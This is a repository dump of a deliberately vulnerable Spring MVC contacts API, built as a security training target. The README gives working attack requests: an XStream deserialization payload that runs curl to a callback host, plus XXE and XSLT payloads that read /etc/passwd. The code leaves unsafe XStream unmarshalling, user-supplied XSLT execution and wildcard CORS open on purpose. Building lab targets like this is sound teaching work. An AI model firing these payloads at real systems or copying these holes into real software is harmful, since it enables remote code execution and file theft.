├── .gitignore
├── Dockerfile
├── README.md
├── doc.xslt
├── pom.xml
└── src
    ├── main
        ├── java
        │   └── org
        │   │   └── insecurelabs
        │   │       ├── CorsFilter.java
        │   │       └── api
        │   │           └── contacts
        │   │               ├── ActualContact.java
        │   │               ├── Contact.java
        │   │               ├── ContactController.java
        │   │               ├── ContactRepository.java
        │   │               └── Formatter.java
        └── webapp
        │   └── WEB-INF
        │       ├── applicationContext.xml
        │       ├── rest-servlet.xml
        │       └── web.xml
    └── test
        └── resources
            └── log4j.properties


/.gitignore:
--------------------------------------------------------------------------------
 1 | *.class
 2 | 
 3 | # Package Files #
 4 | *.jar
 5 | *.war
 6 | *.ear
 7 | 
 8 | # Eclipse
 9 | .project
10 | .classpath
11 | .settings/
12 | bin/**
13 | target/**
14 | 


--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM maven:3-jdk-8
 2 | 
 3 | WORKDIR /app
 4 | 
 5 | COPY src /app/src/
 6 | COPY pom.xml /app
 7 | 
 8 | RUN mvn compile
 9 | 
10 | CMD mvn jetty:run
11 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Vulnerable Spring MVC API
 2 | Vulnerable to:
 3 | 
 4 | * deserialization attacks (OWASP Top 10 A8)
 5 | * XXE (OWASP Top 10 A4)
 6 | * XSLT abuse (XSLT 1.0 and 2.0) 
 7 | 
 8 | ### Running with maven
 9 | 
10 | 1. `git clone https://github.com/eoftedal/deserialize.git`
11 | 2. `cd deserialize`
12 | 3. `mvn jetty:run`
13 | 
14 | Accessible on port 8080
15 | 
16 | ### Running in docker
17 | 1. `git clone https://github.com/eoftedal/deserialize.git`
18 | 2. `cd deserialize`
19 | 3. `docker build -t deserialize .`
20 | 4. `docker run -p 8080:8080 -it deserialize`
21 | 
22 | ## Normal request
23 | 
24 | ```
25 | POST /api/contacts HTTP/1.1
26 | Host: localhost
27 | Content-Type: application/xml
28 | Accept: application/xml
29 | 
30 | <contact>  
31 |     <firstName>yo</firstName>
32 |     <lastName>lo</lastName>
33 |     <email>yo@lo.no</email>
34 | </contact>  
35 | ```
36 | 
37 | ## Deserialization attack
38 | 
39 | ```
40 | POST /api/contacts HTTP/1.1
41 | Host: localhost
42 | Content-Type: application/xml
43 | Accept: application/xml
44 | 
45 | <dynamic-proxy>  
46 |   <interface>org.insecurelabs.api.contacts.Contact</interface>  
47 |   <handler class="java.beans.EventHandler">  
48 |     <target class="java.lang.ProcessBuilder">
49 |       <command><string>/usr/bin/curl</string><string>http://[yourid].burpcollaborator.net</string></command>
50 |     </target>
51 |     <action>start</action>
52 |   </handler>  
53 | </dynamic-proxy> 
54 | ```
55 | 
56 | ## XXE
57 | 
58 | ```
59 | POST /api/contacts HTTP/1.1
60 | Host: localhost
61 | Content-Type: application/xml
62 | Accept: application/xml
63 | 
64 | <?xml version="1.0" encoding="utf-8"?>
65 | <!DOCTYPE root [
66 |     <!ELEMENT string (#PCDATA)>
67 |     <!ENTITY content SYSTEM "file:/etc/passwd">
68 | ]>
69 | <contact>  
70 |     <firstName>&content;</firstName>
71 |     <lastName>lo</lastName>
72 |     <email>yo@lo.no</email>
73 | </contact>
74 | ```
75 | 
76 | ## XSLT 2.0
77 | 
78 | You have to run at least one normal request first.
79 | 
80 | ```
81 | POST /api/contacts/1/html HTTP/1.1
82 | Host: localhost
83 | Content-Type: application/xslt
84 | Accept: text/html
85 | Content-Length: 241
86 | 
87 | <?xml version="1.0" encoding="UTF-8" ?>
88 | <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
89 |  <xsl:template match="/">
90 |   <xsl:value-of select="unparsed-text('/etc/passwd')"/>
91 |  </xsl:template>
92 | </xsl:stylesheet>
93 | ```
94 | 
95 | You can also use URLs instead of file names with `unparsed-text()`. And of course XXE in the XSLT.
96 | 
97 | # Resources
98 | http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
99 | 


--------------------------------------------------------------------------------
/doc.xslt:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8" ?>
2 | <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
3 |  <xsl:template match="/">
4 |    <html>
5 |      <xsl:value-of select="unparsed-text('http://172.18.0.6:9200/')"/>
6 |    </html>
7 |  </xsl:template>
8 | </xsl:stylesheet>
9 | 	


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
  1 | <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  2 | 	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  3 | 	<modelVersion>4.0.0</modelVersion>
  4 | 	<groupId>org.insecurelabs</groupId>
  5 | 	<artifactId>vulnerable-rest-api</artifactId>
  6 | 	<packaging>war</packaging>
  7 | 	<version>0.0.1-SNAPSHOT</version>
  8 | 	<name>Vulnerable REST API</name>
  9 | 	
 10 | 	<properties>
 11 | 		<spring.version>4.0.0.RELEASE</spring.version>
 12 | 		<jetty.version>6.1.26</jetty.version>
 13 | 		<slf4j.version>1.6.1</slf4j.version>
 14 | 		<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
 15 | 		<log4j.version>1.2.16</log4j.version>
 16 | 	</properties>
 17 | 	
 18 | 	<dependencies>
 19 | 		<!-- Spring -->
 20 | 		<dependency>
 21 | 			<groupId>org.springframework</groupId>
 22 | 			<artifactId>spring-core</artifactId>
 23 | 			<version>${spring.version}</version>
 24 | 		</dependency>
 25 | 
 26 | 		<dependency>
 27 | 			<groupId>org.springframework</groupId>
 28 | 			<artifactId>spring-expression</artifactId>
 29 | 			<version>${spring.version}</version>
 30 | 		</dependency>
 31 | 
 32 | 		<dependency>
 33 | 			<groupId>org.springframework</groupId>
 34 | 			<artifactId>spring-beans</artifactId>
 35 | 			<version>${spring.version}</version>
 36 | 		</dependency>
 37 | 
 38 | 		<dependency>
 39 | 			<groupId>org.springframework</groupId>
 40 | 			<artifactId>spring-context</artifactId>
 41 | 			<version>${spring.version}</version>
 42 | 		</dependency>
 43 | 
 44 | 		<dependency>
 45 | 			<groupId>org.springframework</groupId>
 46 | 			<artifactId>spring-oxm</artifactId>
 47 | 			<version>${spring.version}</version>
 48 | 		</dependency>
 49 | 
 50 | 		<dependency>
 51 | 			<groupId>org.springframework</groupId>
 52 | 			<artifactId>spring-aop</artifactId>
 53 | 			<version>${spring.version}</version>
 54 | 		</dependency>
 55 | 
 56 | 
 57 | 		<dependency>
 58 | 			<groupId>org.springframework</groupId>
 59 | 			<artifactId>spring-web</artifactId>
 60 | 			<version>${spring.version}</version>
 61 | 		</dependency>
 62 | 
 63 | 		<dependency>
 64 | 			<groupId>org.springframework</groupId>
 65 | 			<artifactId>spring-webmvc</artifactId>
 66 | 			<version>${spring.version}</version>
 67 | 		</dependency>
 68 | 
 69 | <dependency>
 70 |     <groupId>net.sf.saxon</groupId>
 71 |     <artifactId>saxon</artifactId>
 72 |     <version>8.5.1</version>
 73 | </dependency>
 74 | 
 75 | 
 76 | 		<!-- Validation -->
 77 | 		<dependency>
 78 | 			<groupId>org.hibernate</groupId>
 79 | 			<artifactId>hibernate-validator</artifactId>
 80 | 			<version>4.2.0.Final</version>
 81 | 		</dependency>
 82 | 
 83 | 		<!-- Jackson JSON Mapper -->
 84 | 		<dependency>
 85 | 			<groupId>org.codehaus.jackson</groupId>
 86 | 			<artifactId>jackson-mapper-asl</artifactId>
 87 | 			<version>1.7.1</version>
 88 | 		</dependency>
 89 | 
 90 | 		<!-- XML Mapper -->
 91 | 		<dependency>
 92 | 			<groupId>com.thoughtworks.xstream</groupId>
 93 | 			<artifactId>xstream</artifactId>
 94 | 			<version>1.4.4</version>
 95 | 			<optional>false</optional>
 96 | 		</dependency>
 97 | 
 98 | 		<!-- Jetty -->
 99 | 		<dependency>
100 | 			<groupId>org.mortbay.jetty</groupId>
101 | 			<artifactId>jetty</artifactId>
102 | 			<version>${jetty.version}</version>
103 | 		</dependency>
104 | 
105 | 		<dependency>
106 | 			<groupId>org.mortbay.jetty</groupId>
107 | 			<artifactId>jetty-util</artifactId>
108 | 			<version>${jetty.version}</version>
109 | 		</dependency>
110 | 
111 | 		<!-- Logging -->
112 | 		<dependency>
113 | 			<groupId>org.slf4j</groupId>
114 | 			<artifactId>slf4j-api</artifactId>
115 | 			<version>${slf4j.version}</version>
116 | 			<type>jar</type>
117 | 		</dependency>
118 | 		<dependency>
119 | 			<groupId>org.slf4j</groupId>
120 | 			<artifactId>jcl-over-slf4j</artifactId>
121 | 			<version>${slf4j.version}</version>
122 | 			<type>jar</type>
123 | 		</dependency>
124 | 		<dependency>
125 | 			<groupId>org.slf4j</groupId>
126 | 			<artifactId>slf4j-log4j12</artifactId>
127 | 			<version>${slf4j.version}</version>
128 | 			<type>jar</type>
129 | 		</dependency>
130 | 
131 | 		<dependency>
132 | 			<groupId>log4j</groupId>
133 | 			<artifactId>log4j</artifactId>
134 | 			<version>${log4j.version}</version>
135 | 			<type>jar</type>
136 | 		</dependency>
137 | 
138 | 
139 | 		<!-- Testing -->
140 | 		<dependency>
141 | 			<groupId>junit</groupId>
142 | 			<artifactId>junit</artifactId>
143 | 			<version>4.8.1</version>
144 | 			<scope>test</scope>
145 | 		</dependency>
146 | 
147 | 	</dependencies>
148 | 	<build>
149 | 		<finalName>vulnerable-rest-api</finalName>
150 | 		<plugins>
151 | 			<plugin>
152 | 				<groupId>org.eclipse.jetty</groupId>
153 | 				<artifactId>jetty-maven-plugin</artifactId>
154 | 				<version>9.0.6.v20130930</version>
155 | 				<configuration>
156 | 					<webApp>
157 | 						<contextPath>/api</contextPath>
158 | 					</webApp>
159 | 				</configuration>
160 | 			</plugin>
161 | 		</plugins>
162 | 	</build>
163 | </project>
164 | 


--------------------------------------------------------------------------------
/src/main/java/org/insecurelabs/CorsFilter.java:
--------------------------------------------------------------------------------
 1 | package org.insecurelabs;
 2 | 
 3 | import java.io.IOException;
 4 | 
 5 | import javax.servlet.FilterChain;
 6 | import javax.servlet.ServletException;
 7 | import javax.servlet.http.HttpServletRequest;
 8 | import javax.servlet.http.HttpServletResponse;
 9 | import org.springframework.web.filter.OncePerRequestFilter;
10 | 
11 | public class CorsFilter extends OncePerRequestFilter {
12 | 
13 |     @Override
14 |     protected void doFilterInternal(HttpServletRequest request,
15 |                                     HttpServletResponse response, FilterChain filterChain)
16 |             throws ServletException, IOException {
17 |             response.addHeader("Access-Control-Allow-Origin", "*");
18 |             if (request.getHeader("Access-Control-Request-Method") != null
19 |                     && "OPTIONS".equals(request.getMethod())) {
20 |                 // CORS "pre-flight" request
21 |                 response.addHeader("Access-Control-Allow-Methods",
22 |                         "GET, POST, PUT, DELETE");
23 |                 response.addHeader("Access-Control-Allow-Headers",
24 |                         "X-Requested-With,Origin,Content-Type, Accept");
25 |             }
26 |             filterChain.doFilter(request, response);
27 |     }
28 | 
29 | }


--------------------------------------------------------------------------------
/src/main/java/org/insecurelabs/api/contacts/ActualContact.java:
--------------------------------------------------------------------------------
 1 | package org.insecurelabs.api.contacts;
 2 | 
 3 | import javax.xml.bind.annotation.XmlRootElement;
 4 | import javax.xml.bind.annotation.XmlElement;
 5 | 
 6 | @XmlRootElement(name = "contact")
 7 | public class ActualContact implements Contact {
 8 | 
 9 | 	private String firstName;
10 | 	private String lastName;
11 | 	private int id;
12 | 	private String email;
13 | 
14 | 	public int getId() {
15 | 		return id;
16 | 	}
17 | 	public void setId(int id) {
18 | 		this.id = id;
19 | 	}
20 | 	public String getFirstName() {
21 | 		return firstName;
22 | 	}
23 | 	public void setFirstName(String firstName) {
24 | 		this.firstName = firstName;
25 | 	}
26 | 	public String getLastName() {
27 | 		return lastName;
28 | 	}
29 | 	public void setLastName(String lastName) {
30 | 		this.lastName = lastName;
31 | 	}
32 | 	public String getEmail() {
33 | 		return email;
34 | 	}
35 | 	public void setEmail(String email) {
36 | 		this.email = email;
37 | 	}
38 | 
39 | }
40 | 


--------------------------------------------------------------------------------
/src/main/java/org/insecurelabs/api/contacts/Contact.java:
--------------------------------------------------------------------------------
 1 | package org.insecurelabs.api.contacts;
 2 | 
 3 | import javax.xml.bind.annotation.XmlRootElement;
 4 | import javax.xml.bind.annotation.XmlElement;
 5 | 
 6 | @XmlRootElement(name = "contact")
 7 | public interface Contact {
 8 | 
 9 | 	public int getId();
10 | 	public void setId(int id);
11 | 	public String getFirstName();
12 | 	public void setFirstName(String firstName);
13 | 	public String getLastName();
14 | 	public void setLastName(String lastName);
15 | 	public String getEmail();
16 | 	public void setEmail(String email);
17 | 
18 | }
19 | 


--------------------------------------------------------------------------------
/src/main/java/org/insecurelabs/api/contacts/ContactController.java:
--------------------------------------------------------------------------------
 1 | package org.insecurelabs.api.contacts;
 2 | 
 3 | import org.springframework.stereotype.Controller;
 4 | import org.springframework.ui.Model;
 5 | import org.springframework.web.bind.annotation.PathVariable;
 6 | import org.springframework.web.bind.annotation.RequestMapping;
 7 | import org.springframework.web.bind.annotation.RequestMethod;
 8 | import org.springframework.http.HttpStatus;
 9 | import org.springframework.web.bind.annotation.ResponseStatus;
10 | import org.springframework.web.bind.annotation.RequestBody;
11 | import org.springframework.web.bind.annotation.ResponseBody;
12 | import org.springframework.beans.factory.annotation.Autowired;
13 | import org.springframework.http.ResponseEntity;
14 | import org.springframework.web.servlet.ModelAndView;
15 | import org.springframework.http.*;
16 | 
17 | import javax.xml.parsers.*;
18 | import org.w3c.dom.*;
19 | import java.io.*;
20 | import org.xml.sax.*;
21 | 
22 | 
23 | @Controller
24 | @RequestMapping("/contacts")
25 | public class ContactController {
26 | 	@Autowired
27 | 	private ContactRepository contactRepository;
28 | 
29 | 	@RequestMapping( method = RequestMethod.POST)
30 | 	@ResponseStatus( HttpStatus.CREATED )
31 | 	public final ModelAndView create( @RequestBody Contact contact ){
32 | 		System.out.println("Creating new contact: " + contact.getFirstName());
33 | 		contactRepository.save(contact);
34 | 		return new ModelAndView("", "responseObject", contact);
35 | 	}
36 | 
37 | 	@ResponseStatus( HttpStatus.OK )
38 | 	@RequestMapping(value = " /{id}", method=RequestMethod.GET)
39 | 	public final ModelAndView create( @PathVariable int id ){
40 | 		Contact contact = contactRepository.get(id);
41 | 		return new ModelAndView("", "responseObject", contact);
42 | 	}
43 | 
44 | 	@ResponseStatus( HttpStatus.OK )
45 | 	@RequestMapping(value = " /{id}/html", method=RequestMethod.POST)
46 | 	@ResponseBody
47 | 	public final String format(@PathVariable int id, HttpEntity<String> xslt ){
48 | 		Contact contact = contactRepository.get(id);
49 | 		try {
50 |     	String xml = Formatter.format(contact, xslt.getBody());
51 | 			return xml;
52 | 		} catch(Exception ex) {
53 | 			return ex.getMessage();
54 | 		}
55 | 	}
56 | 
57 | 
58 | 
59 | }
60 |  


--------------------------------------------------------------------------------
/src/main/java/org/insecurelabs/api/contacts/ContactRepository.java:
--------------------------------------------------------------------------------
 1 | package org.insecurelabs.api.contacts;
 2 | 
 3 | import org.springframework.stereotype.Service;
 4 | import java.util.Hashtable;
 5 | 
 6 | @Service
 7 | public class ContactRepository {
 8 | 	static Hashtable<Integer, Contact> store = new Hashtable<Integer, Contact>();
 9 | 	static int counter = 0;
10 | 
11 | 	public void save(Contact contact) {
12 | 		int id = ++counter;
13 | 		contact.setId(id);
14 | 		store.put(id, contact);
15 | 	}
16 | 	public Contact get(int id) {
17 | 		return store.get(id);
18 | 	}
19 | }
20 | 


--------------------------------------------------------------------------------
/src/main/java/org/insecurelabs/api/contacts/Formatter.java:
--------------------------------------------------------------------------------
 1 | package org.insecurelabs.api.contacts;
 2 | 
 3 | import com.thoughtworks.xstream.*;
 4 | import com.thoughtworks.xstream.io.xml.*;
 5 | import java.io.*;
 6 | import javax.xml.transform.*;
 7 | import javax.xml.transform.stream.*;
 8 | import java.nio.*;
 9 | import java.nio.file.*;
10 | 
11 | public class Formatter {
12 |   public static String format(Contact contact, String xslt) throws Exception {
13 |   	System.out.println(xslt);
14 | 		XStream xstream = new XStream();
15 | 		xstream.alias("contact", Contact.class);
16 | 
17 | 		Path path = Paths.get("./doc.xslt");
18 |     Files.write(path, xslt.getBytes());
19 |     System.out.println(path.toString());
20 | 		TraxSource traxSource = new TraxSource(contact, xstream);
21 | 		Writer buffer = new StringWriter();
22 | 		Transformer transformer = TransformerFactory.newInstance().newTransformer(
23 | 		    new StreamSource(path.toFile()));
24 | 		transformer.transform(traxSource, new StreamResult(buffer));
25 | 		return buffer.toString();
26 | 	}
27 | }
28 | 


--------------------------------------------------------------------------------
/src/main/webapp/WEB-INF/applicationContext.xml:
--------------------------------------------------------------------------------
1 | <beans xmlns="http://www.springframework.org/schema/beans"
2 | 	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
3 | 	xsi:schemaLocation="http://www.springframework.org/schema/beans
4 | 	http://www.springframework.org/schema/beans/spring-beans-3.1.xsd">
5 | 
6 |   <bean id="corsFilter" class="org.insecurelabs.CorsFilter" />
7 | 
8 | </beans>


--------------------------------------------------------------------------------
/src/main/webapp/WEB-INF/rest-servlet.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <beans xmlns="http://www.springframework.org/schema/beans"
 3 | 	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:context="http://www.springframework.org/schema/context"
 4 | 	xmlns:mvc="http://www.springframework.org/schema/mvc"
 5 | 	xsi:schemaLocation="http://www.springframework.org/schema/mvc http://www.springframework.org/schema/mvc/spring-mvc-3.1.xsd
 6 | 		http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.1.xsd
 7 | 		http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.1.xsd">
 8 | 
 9 | 	<context:component-scan base-package="org.insecurelabs" />
10 | 
11 | 
12 |   <bean id="corsFilter" class="org.insecurelabs.CorsFilter" />
13 | 
14 | 
15 | 	<bean id="xstreamMarshaller" class="org.springframework.oxm.xstream.XStreamMarshaller">
16 | 		<property name="streamDriver">
17 | 			<bean class="com.thoughtworks.xstream.io.xml.StaxDriver"/>
18 | 		</property>
19 | 		<property name="autodetectAnnotations" value="true" />
20 | 		<property name="aliases">
21 | 			<map>
22 | 				<entry key="contact" value="org.insecurelabs.api.contacts.ActualContact" />
23 | 			</map>
24 | 		</property>
25 | 	</bean>
26 | 
27 | 	<mvc:annotation-driven>
28 | 		<mvc:message-converters>
29 | 			<bean
30 | 				class="org.springframework.http.converter.xml.MarshallingHttpMessageConverter">
31 | 				<property name="marshaller" ref="xstreamMarshaller" />
32 | 				<property name="unmarshaller" ref="xstreamMarshaller" />
33 | 			</bean>
34 | 		</mvc:message-converters>
35 | 	</mvc:annotation-driven>
36 | 
37 | 	<bean name="viewResolver"
38 | 		class="org.springframework.web.servlet.view.ContentNegotiatingViewResolver">
39 | 
40 | 		<property name="ignoreAcceptHeader" value="true" />
41 | 		<property name="favorParameter" value="true" />
42 | 		<property name="favorPathExtension" value="true" />
43 | 		<property name="defaultContentType" value="application/xml" />
44 | 
45 | 		<property name="mediaTypes">
46 | 			<map>
47 | 				<entry key="xml" value="application/xml" />
48 | 				<entry key="html" value="text/html" />
49 | 			</map>
50 | 		</property>
51 | 		<property name="defaultViews">
52 | 			<list>
53 | 				<bean class="org.springframework.web.servlet.view.xml.MarshallingView">
54 | 					<constructor-arg ref="xstreamMarshaller" />
55 | 					<property name="modelKey" value="responseObject" />
56 | 				</bean>
57 | 			</list>
58 | 		</property>
59 | 	</bean>
60 | 
61 | </beans>


--------------------------------------------------------------------------------
/src/main/webapp/WEB-INF/web.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <web-app id="WebApp_9" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"
 3 | 	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 | 	xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
 5 |   http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
 6 | 	<display-name>rest-api</display-name>
 7 | 
 8 | 	<servlet>
 9 | 		<servlet-name>rest</servlet-name>
10 | 		<servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
11 | 		<load-on-startup>1</load-on-startup>
12 | 	</servlet>
13 | 
14 | 	<servlet-mapping>
15 | 		<servlet-name>rest</servlet-name>
16 | 		<url-pattern>
17 | 			/*
18 | 		</url-pattern>
19 | 	</servlet-mapping>
20 | 
21 | 	<listener>
22 | 		<listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
23 | 	</listener>
24 | 
25 | 	<context-param>
26 | 		<param-name>contextConfigLocation</param-name>
27 | 		<param-value>
28 | 			/WEB-INF/applicationContext.xml
29 | 		</param-value>
30 | 	</context-param>
31 | 
32 | 	<filter>
33 | 	    <filter-name>corsFilter</filter-name>
34 | 	    <filter-class>org.springframework.web.filter.DelegatingFilterProxy</filter-class>
35 | 	</filter>
36 | 
37 | 	<filter-mapping>
38 | 	    <filter-name>corsFilter</filter-name>
39 | 	    <url-pattern>/*</url-pattern>
40 | 	</filter-mapping>
41 | 
42 | </web-app>
43 | 


--------------------------------------------------------------------------------
/src/test/resources/log4j.properties:
--------------------------------------------------------------------------------
 1 | # Global logging configuration
 2 | log4j.rootLogger=INFO, stdout, file
 3 | # Console output...
 4 | log4j.appender.stdout=org.apache.log4j.ConsoleAppender
 5 | log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
 6 | log4j.appender.stdout.layout.ConversionPattern=%5p [%t] - %m%n
 7 | 
 8 | log4j.appender.file=org.apache.log4j.FileAppender
 9 | log4j.appender.file.layout=org.apache.log4j.PatternLayout
10 | log4j.appender.file.layout.ConversionPattern=%5p [%t] - %m%n
11 | log4j.appender.file.file=target/testlogs/output.log
12 | 
13 | # set spring framework debugging on. This is useful when checking beans are being loaded, urls are being hit, etc.
14 | log4j.logger.org.springframework=DEBUG
15 | # turn on debugging for our code.
16 | log4j.logger.com.spidertracks=DEBUG


--------------------------------------------------------------------------------